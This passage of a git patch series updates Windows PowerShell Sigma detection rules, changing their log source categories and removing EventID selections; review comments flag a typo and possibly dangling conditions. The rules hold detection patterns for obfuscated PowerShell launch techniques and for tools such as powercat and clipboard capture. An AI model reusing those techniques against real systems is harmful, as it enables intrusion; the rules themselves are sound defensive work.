Threat Research) tags: - attack.defense_evasion @@ -16,11 +16,10 @@ references: - https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: 'Expand-Archive' condition: selection_4103 falsepositives: 
diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 832dab3d..65e81751 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -6,7 +6,7 @@ related: description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. status: experimental date: 2020/05/02 -modified: 2021/10/07 +modified: 2021/10/16 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.collection @@ -16,11 +16,10 @@ references: - https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: 'Get-Clipboard' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 98a298b6..73f8b09f 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: 
@@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index e00f05f9..6e6f969b 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -7,7 +7,7 @@ description: "Detects all variations of obfuscated powershell IEX invocation cod status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1027 @@ -16,11 +16,9 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: - selection_id: - EventID: 4103 selection_payload: - Payload|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' @@ -29,7 +27,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: selection_id and selection_payload + condition: selection_payload falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index ff0cda53..483b4c34 100644 
--- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index f85198cc..91aec4b6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: selection_4103 falsepositives: 
diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 1ba4b73e..43ca7ebd 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index ccbd2b9a..bde55696 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: 
@@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index d5715369..1bd27a93 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 3c823c36..ddfa4f24 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml 
@@ -7,6 +7,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index 791c900b..eb78f9ac 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index 3c12fe92..a30dd2cc 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml 
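Review bot: The context line `definition: PowerShell Module Logging must be enabledd` in the second hunk of powershell_invoke_obfuscation_via_use_mhsta.yml carries a doubled-letter typo that survives the change; the same text appears in powershell_invoke_obfuscation_via_var.yml, powershell_susp_athremotefxvgpudisablementcommand.yml and powershell_susp_zip_compress.yml. Because this commit already rewrites the `logsource` block of each of these files, it is the natural place to correct the line to `definition: PowerShell Module Logging must be enabled`, matching the wording the other rules in the commit use.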
+++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 2b78501f..ddd02c3d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index 649381c9..ef9261ca 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml 
+++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -3,7 +3,7 @@ id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: experimental author: frack113 date: 2021/07/21 -modified: 2021/09/07 +modified: 2021/10/16 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -14,11 +14,10 @@ tags: - attack.t1095 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo|contains: - 'powercat ' - 'powercat.ps1' diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 4bd6369c..ba800a5b 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -3,7 +3,7 @@ id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -16,11 +16,10 @@ tags: - attack.t1028 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo|contains|all: - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = 
diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index c6571b75..cd9751e1 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -3,7 +3,7 @@ id: 38a7625e-b2cb-485d-b83d-aff137d859f4 status: experimental author: frack113 date: 2021/07/13 -modified: 2021/09/07 +modified: 2021/10/16 description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -13,11 +13,9 @@ tags: - attack.t1218 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: - selection_id: - EventID: 4103 selection_cmd: ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' selection_opt: @@ -26,7 +24,7 @@ detection: - '-ModulePath ' - '-ScriptBlock ' - '-RemoteFXvGPUDisablementFilePath' - condition: selection_id and selection_cmd and selection_opt + condition: selection_cmd and selection_opt fields: - ComputerName - User diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 6e9268e7..26b0c14a 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml 
@@ -6,7 +6,7 @@ related: status: experimental author: frack113 date: 2021/07/20 -modified: 2021/10/09 +modified: 2021/10/16 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -15,11 +15,10 @@ tags: - attack.t1074.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 ContextInfo|contains|all: - 'Compress-Archive ' - ' -Path ' From f6b0a891614e454ce1063c13838f7db219aec006 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sat, 16 Oct 2021 08:18:49 +0200 Subject: [PATCH 1248/1367] change to category: ps_script --- .../powershell_script/powershell_accessing_win_api.yml | 5 ++--- .../powershell_script/powershell_adrecon_execution.yml | 4 ++-- .../powershell_automated_collection.yml | 5 ++--- .../powershell_cl_invocation_lolscript.yml | 5 ++--- .../powershell_cl_invocation_lolscript_count.yml | 5 ++--- .../powershell_cl_mutexverifiers_lolscript.yml | 5 ++--- .../powershell_cl_mutexverifiers_lolscript_count.yml | 5 ++--- .../powershell_script/powershell_create_local_user.yml | 5 ++--- .../powershell_script/powershell_data_compressed.yml | 5 ++--- .../powershell_script/powershell_detect_vm_env.yml | 5 ++--- .../powershell_script/powershell_dnscat_execution.yml | 5 ++--- .../powershell_script/powershell_icmp_exfiltration.yml | 4 ++-- .../powershell_script/powershell_invoke_nightmare.yml | 5 ++--- ...hell_invoke_obfuscation_clip_in_scriptblocktext.yml | 5 ++--- ...e_obfuscation_obfuscated_iex_in_scriptblocktext.yml | 10 ++++------ ...ell_invoke_obfuscation_stdin_in_scriptblocktext.yml | 5 ++--- ...shell_invoke_obfuscation_var_in_scriptblocktext.yml | 5 ++--- ...oke_obfuscation_via_compress_in_scriptblocktext.yml | 5 ++--- ...nvoke_obfuscation_via_rundll_in_scriptblocktext.yml | 5 ++--- ...invoke_obfuscation_via_stdin_in_scriptblocktext.yml | 5 ++--- ...oke_obfuscation_via_use_clip_in_scriptblocktext.yml | 5 ++--- ...ke_obfuscation_via_use_mhsta_in_scriptblocktext.yml | 5 ++--- ...obfuscation_via_use_rundll32_in_scriptblocktext.yml | 5 ++--- ...l_invoke_obfuscation_via_var_in_scriptblocktext.yml | 5 ++--- .../powershell_script/powershell_keylogging.yml | 7 +++---- .../powershell_malicious_commandlets.yml | 5 ++--- .../powershell_malicious_keywords.yml | 5 ++--- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- .../powershell_nishang_malicious_commandlets.yml | 5 ++--- .../powershell_script/powershell_ntfs_ads_access.yml | 6 ++---- 
.../powershell_powerview_malicious_commandlets.yml | 5 ++--- .../powershell_prompt_credentials.yml | 5 ++--- .../powershell_script/powershell_psattack.yml | 5 ++--- .../powershell_script/powershell_shellcode_b64.yml | 5 ++--- .../powershell_shellintel_malicious_commandlets.yml | 5 ++--- .../powershell_store_file_in_alternate_data_stream.yml | 7 +++---- ...powershell_susp_zip_compress_in_scriptblocktext.yml | 5 ++--- .../powershell_suspicious_export_pfxcertificate.yml | 3 +-- .../powershell_suspicious_getprocess_lsass.yml | 5 ++--- .../powershell_suspicious_keywords.yml | 5 ++--- .../powershell_suspicious_mail_acces.yml | 4 ++-- .../powershell_suspicious_mounted_share_deletion.yml | 4 ++-- .../powershell_script/powershell_suspicious_recon.yml | 5 ++--- .../powershell_suspicious_win32_pnpentity.yml | 4 ++-- .../powershell_script/powershell_timestomp.yml | 7 +++---- .../powershell_script/powershell_trigger_profiles.yml | 4 ++-- .../powershell_script/powershell_web_request.yml | 5 ++--- .../powershell_windows_firewall_profile_disabled.yml | 4 ++-- .../powershell_winlogon_helper_dll.yml | 5 ++--- .../powershell_script/powershell_wmi_persistence.yml | 7 +++---- .../powershell_script/powershell_wmimplant.yml | 5 ++--- 51 files changed, 107 insertions(+), 152 deletions(-) diff --git a/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml index 4599517b..7c600eb9 100644 --- a/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml @@ -4,7 +4,7 @@ status: experimental description: Detecting use WinAPI Functions in PowerShell author: Nikita Nazarov, oscd.community date: 2020/10/06 -modified: 2021/08/04 +modified: 2021/10/16 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: 
@@ -13,11 +13,10 @@ tags: - attack.t1106 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'WaitForSingleObject' - 'QueueUserApc' diff --git a/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml index af2ba36a..799b4e99 100644 --- a/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml +++ b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml @@ -11,13 +11,13 @@ tags: - attack.t1059.001 author: Bhabesh Raj date: 2021/07/16 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Function Get-ADRExcelComOb' - 'ADRecon-Report.xlsx' #Default diff --git a/rules/windows/powershell/powershell_script/powershell_automated_collection.yml b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml index d19a88ea..a56e163c 100644 --- a/rules/windows/powershell/powershell_script/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml @@ -3,6 +3,7 @@ id: c1dda054-d638-4c16-afc8-53e007f3fbc5 status: experimental author: frack113 date: 2021/07/28 +modified: 2021/10/16 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md @@ -11,11 +12,9 @@ tags: - attack.t1119 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_eventid: - EventID: 4104 selection_ext: ScriptBlockText|contains: - '.doc' 
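Review bot: Removing `EventID: 4104` from `selection` in the second hunk of powershell_accessing_win_api.yml makes the rule depend on the backend's mapping for `category: ps_script` to restrict matching to script block logging events; where that mapping is absent, the generated query reduces to the `ScriptBlockText|contains` list alone. The same change is applied to every file of this commit, so the point holds across all 51 of them. Recording the dependency in the rule, e.g. `definition: Script block logging must be enabled (category ps_script maps to EventID 4104)`, would make the requirement visible to whoever maintains the logsource configuration. The `selection` block continues past the end of the hunk.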
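Review bot: In the second hunk of powershell_automated_collection.yml the `selection_eventid` selection is deleted, but the diffstat for this file shows only 2 insertions and 3 deletions, so the `condition` line, which lies outside the hunk, is not touched by this commit. If that condition still names `selection_eventid`, as the existence of a dedicated selection suggests, the rule now references an undefined selection and will fail to convert; the fix is to drop the `selection_eventid and` term from the condition the way the preceding commit does for powershell_invoke_obfuscation_obfuscated_iex.yml. The same 2-insertion/3-deletion pattern appears in powershell_detect_vm_env.yml further down, whose `selection_id` is removed here without a visible condition change.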
diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml index 054cd341..24dd5f70 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml @@ -4,7 +4,7 @@ description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - https://twitter.com/bohops/status/948061991012327424 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'CL_Invocation.ps1' - 'SyncInvoke' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml index 7bce506c..4a05379f 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml @@ -4,7 +4,7 @@ description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - https://twitter.com/bohops/status/948061991012327424 
@@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'CL_Invocation.ps1' - 'SyncInvoke' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml index 3430cdd7..8c888044 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml @@ -4,7 +4,7 @@ description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - https://twitter.com/pabraeken/status/995111125447577600 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml index ac2c9ed9..e449b6f6 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml 
@@ -4,7 +4,7 @@ description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - https://twitter.com/pabraeken/status/995111125447577600 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' diff --git a/rules/windows/powershell/powershell_script/powershell_create_local_user.yml b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml index 29961866..a5b0d2a8 100644 --- a/rules/windows/powershell/powershell_script/powershell_create_local_user.yml +++ b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml @@ -13,14 +13,13 @@ tags: - attack.t1136 # an old one author: '@ROxPinTeddy' date: 2020/04/11 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'New-LocalUser' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_data_compressed.yml b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml index 72ba0304..c556a660 100644 --- a/rules/windows/powershell/powershell_script/powershell_data_compressed.yml +++ b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml 
@@ -4,16 +4,15 @@ status: experimental description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/07/06 +modified: 2021/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - '-Recurse' - '|' diff --git a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml index 250b71fe..42e30727 100644 --- a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml +++ b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml @@ -3,6 +3,7 @@ id: d93129cd-1ee0-479f-bc03-ca6f129882e3 status: experimental author: frack113 date: 2021/08/03 +modified: 2021/10/16 description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md @@ -12,11 +13,9 @@ tags: - attack.t1497.001 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_action: ScriptBlockText|contains: Get-WmiObject selection_module: diff --git a/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml index bfe388a4..69132d3f 100644 
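Review bot: In powershell_detect_vm_env.yml the `selection_id` block is removed but the `condition` line is outside this hunk, so it is not visible whether the condition still references `selection_id`; if it does, the rule will fail to compile with an undefined-identifier error rather than silently widen. The keylogging rule later in this batch updates its condition in the same commit, so I would expect the same `condition:` change here and would confirm it before merging. The detection block of this rule continues past the end of the hunk.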
